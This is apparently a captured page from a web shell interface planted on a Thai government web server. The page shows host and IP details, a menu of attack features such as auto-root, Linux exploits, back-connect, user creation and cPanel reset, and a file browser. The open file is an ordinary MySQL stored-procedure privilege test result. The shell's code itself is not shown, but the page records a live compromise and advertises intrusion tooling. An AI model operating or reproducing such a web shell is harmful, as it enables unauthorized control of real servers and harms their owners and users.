Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
mysql-test /
suite /
funcs_1 /
r /
[ HOME SHELL ]
Name
Size
Permission
Action
charset_collation.result
1.32
KB
-rw-r--r--
innodb_bitdata.result
117
B
-rw-r--r--
innodb_cursors.result
116
B
-rw-r--r--
innodb_func_view.result
301.02
KB
-rw-r--r--
innodb_storedproc_02.result
36.28
KB
-rw-r--r--
innodb_storedproc_03.result
15.3
KB
-rw-r--r--
innodb_storedproc_06.result
13.28
KB
-rw-r--r--
innodb_storedproc_07.result
7.77
KB
-rw-r--r--
innodb_storedproc_08.result
20.03
KB
-rw-r--r--
innodb_storedproc_10.result
13.21
KB
-rw-r--r--
innodb_trig_0102.result
15.05
KB
-rw-r--r--
innodb_trig_03.result
25.65
KB
-rw-r--r--
innodb_trig_03e.result
51.01
KB
-rw-r--r--
innodb_trig_0407.result
15.4
KB
-rw-r--r--
innodb_trig_08.result
18.39
KB
-rw-r--r--
innodb_trig_09.result
9.97
KB
-rw-r--r--
innodb_trig_1011ext.result
11.75
KB
-rw-r--r--
innodb_trig_frkey.result
2.23
KB
-rw-r--r--
innodb_views.result
580.67
KB
-rw-r--r--
is_basics_mixed.result
30.01
KB
-rw-r--r--
is_character_sets.result
3.96
KB
-rw-r--r--
is_cml_innodb.result
4.65
KB
-rw-r--r--
is_cml_memory.result
3.69
KB
-rw-r--r--
is_cml_myisam.result
4.7
KB
-rw-r--r--
is_cml_ndb.result
4.67
KB
-rw-r--r--
is_coll_char_set_appl.result
4.34
KB
-rw-r--r--
is_collations.result
4.43
KB
-rw-r--r--
is_column_privileges.result
19.22
KB
-rw-r--r--
is_column_privileges_is_mysql_...
1.44
KB
-rw-r--r--
is_columns.result
19.88
KB
-rw-r--r--
is_columns_innodb.result
76.58
KB
-rw-r--r--
is_columns_is.result
66.43
KB
-rw-r--r--
is_columns_is_embedded.result
64.69
KB
-rw-r--r--
is_columns_memory.result
73.43
KB
-rw-r--r--
is_columns_myisam.result
81.7
KB
-rw-r--r--
is_columns_myisam_embedded.res...
71.07
KB
-rw-r--r--
is_columns_mysql.result
47.6
KB
-rw-r--r--
is_columns_mysql_embedded.resu...
41.16
KB
-rw-r--r--
is_columns_ndb.result
13.46
KB
-rw-r--r--
is_engines.result
3.88
KB
-rw-r--r--
is_engines_archive.result
161
B
-rw-r--r--
is_engines_blackhole.result
205
B
-rw-r--r--
is_engines_csv.result
149
B
-rw-r--r--
is_engines_federated.result
173
B
-rw-r--r--
is_engines_innodb.result
198
B
-rw-r--r--
is_engines_memory.result
194
B
-rw-r--r--
is_engines_merge.result
182
B
-rw-r--r--
is_engines_myisam.result
195
B
-rw-r--r--
is_engines_ndb.result
178
B
-rw-r--r--
is_events.result
6.37
KB
-rw-r--r--
is_key_column_usage.result
16.8
KB
-rw-r--r--
is_key_column_usage_embedded.r...
16.94
KB
-rw-r--r--
is_routines.result
23.09
KB
-rw-r--r--
is_routines_embedded.result
23.94
KB
-rw-r--r--
is_schema_privileges.result
14.65
KB
-rw-r--r--
is_schema_privileges_is_mysql_...
1.86
KB
-rw-r--r--
is_schemata.result
8.57
KB
-rw-r--r--
is_schemata_embedded.result
8.75
KB
-rw-r--r--
is_schemata_is_mysql_test.resu...
1.59
KB
-rw-r--r--
is_statistics.result
17.47
KB
-rw-r--r--
is_statistics_is.result
1004
B
-rw-r--r--
is_statistics_mysql.result
4.47
KB
-rw-r--r--
is_statistics_mysql_embedded.r...
7.98
KB
-rw-r--r--
is_table_constraints.result
14.35
KB
-rw-r--r--
is_table_constraints_is.result
828
B
-rw-r--r--
is_table_constraints_mysql.res...
1.9
KB
-rw-r--r--
is_table_constraints_mysql_emb...
3.02
KB
-rw-r--r--
is_table_privileges.result
15.08
KB
-rw-r--r--
is_tables.result
17.26
KB
-rw-r--r--
is_tables_embedded.result
17.48
KB
-rw-r--r--
is_tables_innodb.result
3.98
KB
-rw-r--r--
is_tables_is.result
26.86
KB
-rw-r--r--
is_tables_memory.result
4.02
KB
-rw-r--r--
is_tables_myisam.result
4.03
KB
-rw-r--r--
is_tables_myisam_embedded.resu...
4.43
KB
-rw-r--r--
is_tables_mysql.result
12.05
KB
-rw-r--r--
is_tables_mysql_embedded.resul...
22.96
KB
-rw-r--r--
is_tables_ndb.result
4
KB
-rw-r--r--
is_triggers.result
13.86
KB
-rw-r--r--
is_triggers_embedded.result
11.97
KB
-rw-r--r--
is_user_privileges.result
23.96
KB
-rw-r--r--
is_views.result
11.22
KB
-rw-r--r--
is_views_embedded.result
10.98
KB
-rw-r--r--
memory_bitdata.result
168
B
-rw-r--r--
memory_cursors.result
167
B
-rw-r--r--
memory_func_view.result
301.07
KB
-rw-r--r--
memory_storedproc_02.result
36.33
KB
-rw-r--r--
memory_storedproc_03.result
15.35
KB
-rw-r--r--
memory_storedproc_06.result
13.35
KB
-rw-r--r--
memory_storedproc_07.result
7.82
KB
-rw-r--r--
memory_storedproc_08.result
20.59
KB
-rw-r--r--
memory_storedproc_10.result
13.26
KB
-rw-r--r--
memory_trig_0102.result
15.1
KB
-rw-r--r--
memory_trig_03.result
25.7
KB
-rw-r--r--
memory_trig_03e.result
49.44
KB
-rw-r--r--
memory_trig_0407.result
15.45
KB
-rw-r--r--
memory_trig_08.result
18.44
KB
-rw-r--r--
memory_trig_09.result
10.02
KB
-rw-r--r--
memory_trig_1011ext.result
11.81
KB
-rw-r--r--
memory_views.result
580.77
KB
-rw-r--r--
myisam_bitdata.result
168
B
-rw-r--r--
myisam_cursors.result
167
B
-rw-r--r--
myisam_func_view.result
301.07
KB
-rw-r--r--
myisam_storedproc_02.result
36.33
KB
-rw-r--r--
myisam_storedproc_03.result
15.35
KB
-rw-r--r--
myisam_storedproc_06.result
13.35
KB
-rw-r--r--
myisam_storedproc_07.result
7.82
KB
-rw-r--r--
myisam_storedproc_08.result
20.59
KB
-rw-r--r--
myisam_storedproc_10.result
13.26
KB
-rw-r--r--
myisam_trig_0102.result
15.1
KB
-rw-r--r--
myisam_trig_03.result
25.7
KB
-rw-r--r--
myisam_trig_03e.result
49.44
KB
-rw-r--r--
myisam_trig_0407.result
15.45
KB
-rw-r--r--
myisam_trig_08.result
18.44
KB
-rw-r--r--
myisam_trig_09.result
10.02
KB
-rw-r--r--
myisam_trig_1011ext.result
11.81
KB
-rw-r--r--
myisam_views-big.result
595.72
KB
-rw-r--r--
ndb_bitdata.result
117
B
-rw-r--r--
ndb_cursors.result
116
B
-rw-r--r--
ndb_func_view.result
301.02
KB
-rw-r--r--
ndb_storedproc_02.result
36.28
KB
-rw-r--r--
ndb_storedproc_03.result
15.3
KB
-rw-r--r--
ndb_storedproc_06.result
13.38
KB
-rw-r--r--
ndb_storedproc_07.result
7.77
KB
-rw-r--r--
ndb_storedproc_08.result
20.03
KB
-rw-r--r--
ndb_storedproc_10.result
13.21
KB
-rw-r--r--
ndb_trig_0102.result
15.05
KB
-rw-r--r--
ndb_trig_03.result
25.65
KB
-rw-r--r--
ndb_trig_03e.result
50.97
KB
-rw-r--r--
ndb_trig_0407.result
15.4
KB
-rw-r--r--
ndb_trig_08.result
18.39
KB
-rw-r--r--
ndb_trig_09.result
9.97
KB
-rw-r--r--
ndb_trig_1011ext.result
11.77
KB
-rw-r--r--
ndb_views.result
580.63
KB
-rw-r--r--
processlist_priv_no_prot.resul...
28.85
KB
-rw-r--r--
processlist_priv_ps.result
28.88
KB
-rw-r--r--
processlist_val_no_prot.result
91.88
KB
-rw-r--r--
processlist_val_ps.result
91.89
KB
-rw-r--r--
storedproc.result
927.84
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ndb_storedproc_06.result
--source suite/funcs_1/storedproc/load_sp_tb.inc -------------------------------------------------------------------------------- --source suite/funcs_1/storedproc/cleanup_sp_tb.inc -------------------------------------------------------------------------------- DROP DATABASE IF EXISTS db_storedproc; DROP DATABASE IF EXISTS db_storedproc_1; CREATE DATABASE db_storedproc; CREATE DATABASE db_storedproc_1; USE db_storedproc; create table t1(f1 char(20),f2 char(25),f3 date,f4 int,f5 char(25),f6 int) engine = <engine_to_be_tested>; load data infile '<MYSQLTEST_VARDIR>/std_data/funcs_1/t4.txt' into table t1; create table t2(f1 char(20),f2 char(25),f3 date,f4 int,f5 char(25),f6 int) engine = <engine_to_be_tested>; load data infile '<MYSQLTEST_VARDIR>/std_data/funcs_1/t4.txt' into table t2; create table t3(f1 char(20),f2 char(20),f3 integer) engine = <engine_to_be_tested>; load data infile '<MYSQLTEST_VARDIR>/std_data/funcs_1/t3.txt' into table t3; create table t4(f1 char(20),f2 char(25),f3 date,f4 int,f5 char(25),f6 int) engine = <engine_to_be_tested>; load data infile '<MYSQLTEST_VARDIR>/std_data/funcs_1/t4.txt' into table t4; USE db_storedproc_1; create table t6(f1 char(20),f2 char(25),f3 date,f4 int,f5 char(25),f6 int) engine = <engine_to_be_tested>; load data infile '<MYSQLTEST_VARDIR>/std_data/funcs_1/t4.txt' into table t6; USE db_storedproc; create table t7 (f1 char(20), f2 char(25), f3 date, f4 int) engine = <engine_to_be_tested>; load data infile '<MYSQLTEST_VARDIR>/std_data/funcs_1/t7.txt' into table t7; Warnings: Warning 1265 Data truncated for column 'f3' at row 1 Warning 1265 Data truncated for column 'f3' at row 2 Warning 1265 Data truncated for column 'f3' at row 3 Warning 1265 Data truncated for column 'f3' at row 4 Warning 1265 Data truncated for column 'f3' at row 5 Warning 1265 Data truncated for column 'f3' at row 6 Warning 1265 Data truncated for column 'f3' at row 7 Warning 1265 Data truncated for column 'f3' at row 8 Warning 1265 Data truncated for column 'f3' at row 9 Warning 1265 Data truncated for column 'f3' at row 10 create table t8 (f1 char(20), f2 char(25), f3 date, f4 int) engine = <engine_to_be_tested>; load data infile '<MYSQLTEST_VARDIR>/std_data/funcs_1/t7.txt' into table t8; Warnings: Warning 1265 Data truncated for column 'f3' at row 1 Warning 1265 Data truncated for column 'f3' at row 2 Warning 1265 Data truncated for column 'f3' at row 3 Warning 1265 Data truncated for column 'f3' at row 4 Warning 1265 Data truncated for column 'f3' at row 5 Warning 1265 Data truncated for column 'f3' at row 6 Warning 1265 Data truncated for column 'f3' at row 7 Warning 1265 Data truncated for column 'f3' at row 8 Warning 1265 Data truncated for column 'f3' at row 9 Warning 1265 Data truncated for column 'f3' at row 10 create table t9(f1 int, f2 char(25), f3 int) engine = <engine_to_be_tested>; load data infile '<MYSQLTEST_VARDIR>/std_data/funcs_1/t9.txt' into table t9; create table t10(f1 char(20),f2 char(25),f3 date,f4 int,f5 char(25),f6 int) engine = <engine_to_be_tested>; load data infile '<MYSQLTEST_VARDIR>/std_data/funcs_1/t4.txt' into table t10; create table t11(f1 char(20),f2 char(25),f3 date,f4 int,f5 char(25),f6 int) engine = <engine_to_be_tested>; load data infile '<MYSQLTEST_VARDIR>/std_data/funcs_1/t4.txt' into table t11; Section 3.1.6 - Privilege Checks: -------------------------------------------------------------------------------- USE db_storedproc_1; root@localhost db_storedproc_1 Testcase 3.1.6.1: ----------------- Ensure that no user may create a stored procedure without the GRANT CREATE ROUTINE privilege. -------------------------------------------------------------------------------- create user 'user_1'@'localhost'; grant all on db_storedproc_1.* to 'user_1'@'localhost'; revoke create routine on db_storedproc_1.* from 'user_1'@'localhost'; flush privileges; DROP PROCEDURE IF EXISTS sp1; user_1@localhost db_storedproc_1 USE db_storedproc_1; CREATE PROCEDURE sp1(v1 char(20)) BEGIN SELECT * from db_storedproc_1.t6 where t6.f2= 'xyz'; END// ERROR 42000: Access denied for user 'user_1'@'localhost' to database 'db_storedproc_1' USE db_storedproc_1; root@localhost db_storedproc_1 GRANT CREATE ROUTINE ON db_storedproc_1.* TO 'user_1'@'localhost'; user_1@localhost db_storedproc_1 USE db_storedproc_1; CREATE PROCEDURE sp1(v1 char(20)) BEGIN SELECT * from db_storedproc_1.t6 where t6.f2= 'xyz'; END// USE db_storedproc_1; root@localhost db_storedproc_1 DROP USER 'user_1'@'localhost'; DROP PROCEDURE sp1; Testcase 3.1.6.2: ----------------- Ensure that root always has the GRANT CREATE ROUTINE privilege. (checked by other testscases) -------------------------------------------------------------------------------- grant create routine on db_storedproc_1.* to 'user_1'@'localhost'; flush privileges; user_1@localhost db_storedproc_1 DROP PROCEDURE IF EXISTS sp3; DROP FUNCTION IF EXISTS fn1; CREATE PROCEDURE sp3(v1 char(20)) BEGIN SELECT * from db_storedproc_1.t6 where t6.f2= 'xyz'; END// CREATE FUNCTION fn1(v1 int) returns int BEGIN return v1; END// USE db_storedproc_1; root@localhost db_storedproc_1 drop user 'user_1'@'localhost'; DROP PROCEDURE sp3; DROP FUNCTION fn1; Warnings: Warning 1403 There is no such grant defined for user 'user_1' on host 'localhost' on routine 'fn1' Testcase 3.1.6.4: ----------------- Ensure that the default security provision of a stored procedure is SQL SECURITY DEFINER. -------------------------------------------------------------------------------- CREATE USER 'user_1'@'localhost'; grant update on db_storedproc_1.t6 to 'user_1'@'localhost'; grant execute on db_storedproc_1.* to 'user_1'@'localhost'; flush privileges; USE db_storedproc_1; DROP PROCEDURE IF EXISTS sp4; CREATE PROCEDURE sp4(v1 char(20)) BEGIN SELECT * from db_storedproc_1.t6 where t6.f2= 'xyz'; END// user_1@localhost db_storedproc_1 USE db_storedproc_1; CALL sp4('a'); f1 f2 f3 f4 f5 f6 SELECT SPECIFIC_NAME, ROUTINE_SCHEMA, ROUTINE_NAME, ROUTINE_TYPE, ROUTINE_BODY, ROUTINE_DEFINITION, IS_DETERMINISTIC, SQL_DATA_ACCESS, SECURITY_TYPE, SQL_MODE, ROUTINE_COMMENT FROM information_schema.routines WHERE routine_schema LIKE 'db_sto%'; SPECIFIC_NAME sp4 ROUTINE_SCHEMA db_storedproc_1 ROUTINE_NAME sp4 ROUTINE_TYPE PROCEDURE ROUTINE_BODY SQL ROUTINE_DEFINITION NULL IS_DETERMINISTIC NO SQL_DATA_ACCESS CONTAINS SQL SECURITY_TYPE DEFINER SQL_MODE ROUTINE_COMMENT root@localhost db_storedproc_1 DROP PROCEDURE sp4; DROP USER 'user_1'@'localhost'; Testcase 3.1.6.5: ----------------- Ensure that a stored procedure defined with SQL SECURITY DEFINER can be called/executed by any user, using only the privileges (including database access privileges) associated with the user who created the stored procedure. -------------------------------------------------------------------------------- USE db_storedproc_1; CREATE TABLE t3165 ( c1 char(20), c2 char(20), c3 date); INSERT INTO t3165 VALUES ('inserted', 'outside of SP', NULL); create user 'user_1'@'localhost'; create user 'user_2'@'localhost'; grant create routine on db_storedproc_1.* to 'user_1'@'localhost'; grant SELECT on db_storedproc_1.* to 'user_2'@'localhost'; grant execute on db_storedproc_1.* to 'user_2'@'localhost'; flush privileges; user_1@localhost db_storedproc_1 CREATE PROCEDURE sp5_s_i () sql security definer BEGIN SELECT * from db_storedproc_1.t3165; insert into db_storedproc_1.t3165 values ('inserted', 'from sp5_s_i', 1000); END// CREATE PROCEDURE sp5_sel () sql security definer BEGIN SELECT * from db_storedproc_1.t3165; END// CREATE PROCEDURE sp5_ins () sql security definer BEGIN insert into db_storedproc_1.t3165 values ('inserted', 'from sp5_ins', 1000); END// user_2@localhost db_storedproc_1 CALL sp5_s_i(); ERROR 42000: SELECT command denied to user 'user_1'@'localhost' for table 't3165' CALL sp5_ins(); ERROR 42000: INSERT command denied to user 'user_1'@'localhost' for table 't3165' CALL sp5_sel(); ERROR 42000: SELECT command denied to user 'user_1'@'localhost' for table 't3165' root@localhost db_storedproc_1 CALL sp5_sel(); ERROR 42000: SELECT command denied to user 'user_1'@'localhost' for table 't3165' grant insert on db_storedproc_1.* to 'user_1'@'localhost'; flush privileges; user_2@localhost db_storedproc_1 CALL sp5_s_i(); ERROR 42000: SELECT command denied to user 'user_1'@'localhost' for table 't3165' CALL sp5_ins(); CALL sp5_sel(); ERROR 42000: SELECT command denied to user 'user_1'@'localhost' for table 't3165' root@localhost db_storedproc_1 CALL sp5_sel(); ERROR 42000: SELECT command denied to user 'user_1'@'localhost' for table 't3165' grant SELECT on db_storedproc_1.* to 'user_1'@'localhost'; flush privileges; user_2@localhost db_storedproc_1 CALL sp5_s_i(); c1 c2 c3 inserted outside of SP NULL inserted from sp5_ins 2000-10-00 CALL sp5_ins(); CALL sp5_sel(); c1 c2 c3 inserted outside of SP NULL inserted from sp5_ins 2000-10-00 inserted from sp5_s_i 2000-10-00 inserted from sp5_ins 2000-10-00 root@localhost db_storedproc_1 REVOKE INSERT on db_storedproc_1.* from 'user_1'@'localhost'; flush privileges; user_2@localhost db_storedproc_1 CALL sp5_s_i(); c1 c2 c3 inserted outside of SP NULL inserted from sp5_ins 2000-10-00 inserted from sp5_s_i 2000-10-00 inserted from sp5_ins 2000-10-00 ERROR 42000: INSERT command denied to user 'user_1'@'localhost' for table 't3165' CALL sp5_ins(); ERROR 42000: INSERT command denied to user 'user_1'@'localhost' for table 't3165' CALL sp5_sel(); c1 c2 c3 inserted outside of SP NULL inserted from sp5_ins 2000-10-00 inserted from sp5_s_i 2000-10-00 inserted from sp5_ins 2000-10-00 root@localhost db_storedproc_1 REVOKE SELECT on db_storedproc_1.* from 'user_1'@'localhost'; flush privileges; user_2@localhost db_storedproc_1 CALL sp5_s_i(); ERROR 42000: SELECT command denied to user 'user_1'@'localhost' for table 't3165' CALL sp5_ins(); ERROR 42000: INSERT command denied to user 'user_1'@'localhost' for table 't3165' CALL sp5_sel(); ERROR 42000: SELECT command denied to user 'user_1'@'localhost' for table 't3165' root@localhost db_storedproc_1 DROP PROCEDURE sp5_s_i; DROP PROCEDURE sp5_sel; DROP PROCEDURE sp5_ins; DROP TABLE t3165; DROP USER 'user_1'@'localhost'; DROP USER 'user_2'@'localhost'; Testcase 3.1.6.6: ----------------- Ensure that a stored procedure defined with SQL SECURITY INVOKER can be called/executed by any user, using only the privileges (including database access privileges) associated with the user executing the stored procedure. -------------------------------------------------------------------------------- USE db_storedproc_1; CREATE TABLE t3166 ( c1 char(30) ); INSERT INTO db_storedproc_1.t3166 VALUES ('inserted outside SP'); create user 'user_1'@'localhost'; create user 'user_2'@'localhost'; GRANT CREATE ROUTINE ON db_storedproc_1.* TO 'user_1'@'localhost'; GRANT SELECT ON db_storedproc_1.* TO 'user_2'@'localhost'; GRANT EXECUTE ON db_storedproc_1.* TO 'user_2'@'localhost'; FLUSH PRIVILEGES; user_1@localhost db_storedproc_1 CREATE PROCEDURE sp3166_s_i () SQL SECURITY INVOKER BEGIN SELECT * from db_storedproc_1.t3166; insert into db_storedproc_1.t3166 values ('inserted from sp3166_s_i'); END// CREATE PROCEDURE sp3166_sel () SQL SECURITY INVOKER BEGIN SELECT * from db_storedproc_1.t3166; END// CREATE PROCEDURE sp3166_ins () SQL SECURITY INVOKER BEGIN insert into db_storedproc_1.t3166 values ('inserted from sp3166_ins'); END// user_2@localhost db_storedproc_1 CALL sp3166_s_i(); c1 inserted outside SP ERROR 42000: INSERT command denied to user 'user_2'@'localhost' for table 't3166' CALL sp3166_ins(); ERROR 42000: INSERT command denied to user 'user_2'@'localhost' for table 't3166' CALL sp3166_sel(); c1 inserted outside SP root@localhost db_storedproc_1 CALL sp3166_sel(); c1 inserted outside SP GRANT INSERT ON db_storedproc_1.* TO 'user_2'@'localhost'; FLUSH PRIVILEGES; user_2@localhost db_storedproc_1 CALL sp3166_s_i(); c1 inserted outside SP CALL sp3166_ins(); CALL sp3166_sel(); c1 inserted outside SP inserted from sp3166_s_i inserted from sp3166_ins root@localhost db_storedproc_1 CALL sp3166_sel(); c1 inserted outside SP inserted from sp3166_s_i inserted from sp3166_ins REVOKE SELECT ON db_storedproc_1.* FROM 'user_2'@'localhost'; FLUSH PRIVILEGES; user_2@localhost db_storedproc_1 CALL sp3166_s_i(); ERROR 42000: SELECT command denied to user 'user_2'@'localhost' for table 't3166' CALL sp3166_ins(); CALL sp3166_sel(); ERROR 42000: SELECT command denied to user 'user_2'@'localhost' for table 't3166' CALL sp3166_s_i(); c1 inserted outside SP inserted from sp3166_s_i inserted from sp3166_ins inserted from sp3166_ins root@localhost db_storedproc_1 REVOKE EXECUTE on db_storedproc_1.* FROM 'user_2'@'localhost'; FLUSH PRIVILEGES; user_2@localhost db_storedproc_1 CALL sp3166_s_i(); ERROR 42000: execute command denied to user 'user_2'@'localhost' for routine 'db_storedproc_1.sp3166_s_i' CALL sp3166_ins(); ERROR 42000: execute command denied to user 'user_2'@'localhost' for routine 'db_storedproc_1.sp3166_ins' CALL sp3166_sel(); ERROR 42000: execute command denied to user 'user_2'@'localhost' for routine 'db_storedproc_1.sp3166_sel' root@localhost db_storedproc_1 DROP PROCEDURE sp3166_s_i; DROP PROCEDURE sp3166_sel; DROP PROCEDURE sp3166_ins; DROP TABLE t3166; DROP USER 'user_1'@'localhost'; DROP USER 'user_2'@'localhost'; --source suite/funcs_1/storedproc/cleanup_sp_tb.inc -------------------------------------------------------------------------------- DROP DATABASE IF EXISTS db_storedproc; DROP DATABASE IF EXISTS db_storedproc_1; . +++ END OF SCRIPT +++ --------------------------------------------------------------------------------
Close